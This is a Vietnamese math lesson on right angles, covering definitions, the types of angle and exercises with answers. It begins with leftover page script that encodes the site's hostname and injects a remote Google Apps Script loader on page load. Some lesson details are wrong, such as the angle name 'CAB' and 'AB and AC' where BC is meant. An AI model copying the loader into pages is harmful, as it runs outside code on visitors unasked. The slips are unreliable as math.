var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Góc vuông là gì? Góc vuông bao nhiêu độ?

Nhận biết góc là một điều rất quan trọng khi giải một bài toán hình, đặc biệt là góc vuông. Vậy thế nào là góc vuông? Cách đo góc vuông? Bài viết dưới đây giúp các bạn hiểu rõ hơn về định nghĩa góc vuông.

1. Góc vuông là gì?

Nhắc lại định nghĩa về góc: Góc là hình gồm hai tia chung gốc. Hai cạnh của góc là hai tia. Góc chung của hai cạnh là đỉnh của góc.

Ví dụ:

goc-vuong-la-gi-cach-nhan-biet-goc-vuong-1

Hình trên là hình minh họa một góc. Hai cạnh của góc là AB và BC, đỉnh của góc là góc chung của hai cạnh là B.

Đọc tên là: góc ABC, góc CAB hoặc góc B

Kí hiệu:

*Định nghĩa về góc vuông:

Góc vuông là góc được tạo bởi hai đường thẳng hoặc hai đoạn thẳng cắt nhau và tạo với nhau một góc có số đo bằng 90 độ.

Ví dụ:

goc-vuong-la-gi-cach-nhan-biet-goc-vuong-2
Góc ABC là góc vuông tại B

Hình trên là mình họa của một góc vuông với:

+ AB, BC là hai cạnh

+ Hai cạnh AB và BC cắt nhau tại đỉnh B

+ Hai cạnh AB và AC cắt tạo với nhau một góc 90 độ

Kí hiệu:

2. Góc vuông bao nhiêu độ?

Để một góc là góc vuông thì góc đó phải có số đo bằng 90 độ.

3. Các dạng bài tập liên quan đến góc vuông

3.1. Dạng 1: Nhận biết góc vuông

*Phương pháp giải:

Dựa vào khái niệm của góc vuông (bao gồm cả khái niệm các loại góc khác để làm bài)

Nhắc lại khái niệm các loại góc:

  • Góc nhọn là góc được tạo bởi hai đường thẳng hoặc hai đoạn thẳng cắt nhau và tạo với nhau một góc mà góc đó có số đo lớn hơn 0° và nhỏ hơn 90°.
  • Góc vuông là góc được tạo bởi hai đường thẳng hoặc hai đoạn thẳng cắt nhau và tạo với nhau một góc có số đo bằng 90 độ
  • Góc tù là góc được tạo bởi hai đường thẳng hoặc hai đoạn thẳng cắt nhau và tạo với nhau một góc mà góc đó có số đo lớn hơn 90° và nhỏ hơn 180°.
  • Góc bẹt là góc được tạo bởi hai đường thẳng hoặc hai đoạn thẳng cắt nhau và tạo với nhau một góc có số đo bằng 180°

Bài tập áp dụng:

Xác định tên của các loại góc sau đây:

goc-vuong-la-gi-cach-nhan-biet-goc-vuong-3
Hình 1
goc-vuong-la-gi-cach-nhan-biet-goc-vuong-4
Hình 2
goc-vuong-la-gi-cach-nhan-biet-goc-vuong-5
Hình 3
goc-vuong-la-gi-cach-nhan-biet-goc-vuong-6
Hình 4

ĐÁP ÁN

Dựa vào khái niệm các loại góc ta thấy:

Hình 1: Nhìn vào hình ta thấy, góc có số đo lớn hơn 0° và nhỏ hơn 90° nên đây là góc nhọn

Hình 2: Nhìn vào hình ta thấy, góc có số đo lớn hơn 90° và nhỏ hơn 180° nên đây là góc tù

Hình 3: Nhìn vào hình ta thấy, góc có số đo bằng 90° nên đây là góc vuông

Hình 4: Nhìn vào hình ta thấy, góc có số đo bằng 180° nên đây là góc bẹt

3.2. Dạng 2: Đọc tên góc vuông

*Phương pháp giải:

Dựa vào khái niệm góc vuông và cách đọc tên của góc để giải bài toán

Nhắc lại cách đọc tên góc: Khi đọc tên góc, để tránh nhầm lẫn với các góc khác, ta thường đọc tên góc bằng 3 chữ cái, ta đọc đỉnh của góc ở giữa, hai chữ cái còn lại là hai đầu mút của hai đoạn thẳng (hai cạnh) tạo ra góc. Trong trường hợp, góc đứng một mình thì ta được phép gọi tên góc bằng một chữ cái là đỉnh của góc.

Bài tập áp dụng:

Bài 1: Đọc tên các góc vuông và các cạnh tạo ra góc đó trong hình dưới đây:

goc-vuong-la-gi-cach-nhan-biet-goc-vuong-7

Để làm được bài toán, ta phải xác định được góc vuông sau đó đọc tên góc vuông và các cạnh của góc.

ĐÁP ÁN

  • Góc vuông AOD với đỉnh O, cạnh OA và OD
  • Góc vuông AOC với đỉnh O, cạnh OA và OC
  • Góc vuông COB với đỉnh O, cạnh OB và OC
  • Góc vuông BOD với đỉnh O, cạnh OB và OD

Bài 2: Đọc tên tất cả các loại góc và các cạnh tạo ra nó trong hình dưới đây:

goc-vuong-la-gi-cach-nhan-biet-goc-vuong-8

Đầu tiên, ta phải xác định được loại góc, sau đó đọc tên và chỉ ra hai cạnh của góc.

ĐÁP ÁN

  • Có 2 góc vuông

+ Góc MON với đỉnh O và hai cạnh là OM, ON

+ Góc MOQ với đỉnh O và hai cạnh là OM, OQ

  • Góc nhọn

+ Góc NOE với đỉnh O và hai cạnh là ON, OE

+ Góc MOE với đỉnh O và hai cạnh là OM, OE

+ Góc FOM với đỉnh O và hai cạnh là OF, OM

+ Góc FOQ với đỉnh O và hai cạnh là OF, OQ

+ Góc FOE với đỉnh O và hai cạnh là OF, OE

  • Góc tù

+ Góc FON với đỉnh O và hai cạnh là OF, ON

+ Góc EOQ với đỉnh O và hai cạnh là OE, OQ

  • Góc bẹt

+ Góc QON (hoặc góc NOQ) với đỉnh O và hai cạnh ON, OQ

3.3. Dạng 3: Đếm góc vuông có trong hình

Phương pháp giải: Dựa vào khái niệm và điều kiện của góc vuông để đếm được số góc vuông trong hình

Bài tập áp dụng:

Bài 1: Đếm và chỉ ra số góc vuông có trong hình sau:

goc-vuong-la-gi-cach-nhan-biet-goc-vuong-9

ĐÁP ÁN

Có 5 góc vuông trong hình đó là: góc ABE, góc BED, góc EDA, góc DAB, góc DEC

Bài 2: Đếm và chỉ ra số góc vuông, góc nhọn, góc tù, góc bẹt trong hình dưới đây:

goc-vuong-la-gi-cach-nhan-biet-goc-vuong-10

ĐÁP ÁN

Nhìn vào hình vẽ ta thấy:

  • Có 8 góc vuông đó là: góc MNP, góc NPQ, góc PQM, góc QMN, góc PQK, góc QKH, góc KHP, góc HPQ
  • Có 7 góc nhọn đó là: góc PQH, góc PHQ, góc KQH, góc KHQ, góc GKH, góc GHK, góc HGK
  • Có 4 góc tù đó là: góc QHG, góc QKG, góc MQH, góc PHG
  • Có 2 góc bẹt đó là: góc NPH, góc MQK

Bài viết trên là toàn bộ những kiến thức liên quan đến góc vuông. Hy vọng các bạn học sinh có thể hiểu và làm được các bài tập về góc vuông.

Chịu trách nhiệm nội dung: GV Nguyễn Thị Trang